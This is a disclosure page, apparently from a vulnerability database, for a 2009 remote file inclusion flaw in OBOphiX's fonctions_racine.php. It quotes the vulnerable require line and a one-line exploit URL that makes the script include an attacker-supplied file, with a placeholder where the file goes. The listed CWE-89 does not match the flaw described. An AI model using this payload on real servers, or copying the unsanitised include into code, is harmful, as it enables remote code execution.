OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln

2009-09-14 / 2009-09-15
Credit: EA Ngel
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[*] OBOphiX [fonctions_racine.php] <= 2.7.0 Remote File Include Vulnerability [+] Author : EA Ngel [+] Location : Manado - Indonesia [+] Situs : www[dot]manadocoding[dot]net [+] Contact : engelpemula@gmail.com [+] Download Script : http://biznetnetworks.dl.sourceforge.net/project/obophix/obophix/pack%20complet%20V1.0/lib.V1.zip [/] Dork : cari sandiri jo neh <= :d [#] Bug : require("$chemin_lib/config.inc.php"); [^] 3xpl0it : http://localhost/[path]/fonctions_racine.php?chemin_lib=[thanks.txt?] [@] Special Thanks : str0ke, basix, kamuiclone, Mr.C, cokiki, bl4ck_3n9in3, cyberlog, dbanie, fl3xu5, exnome g4pt3k, tonaas, doniskynet, rezagms, wishnu, my_wishdom, b0b0h0, jeckham, k3nz0, yadiyauri akiko, steve_san, steve_diving, moon_lee, c6, bibeh^pink, missi, luv13, hyhgao, eyin, key, sansan and all friends [!] Greetz to0 : cr4wl3r is companions in arms and cpu monitor, keyboard, mouse <= :d | gorontalodefacer[dot]org | sekuritionline[dot]net | [^] Note : Jangan pernah malu untuk menjadi seorang pemula TUHAN MEMBERKATI

References:

http://www.milw0rm.com/exploits/9600


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top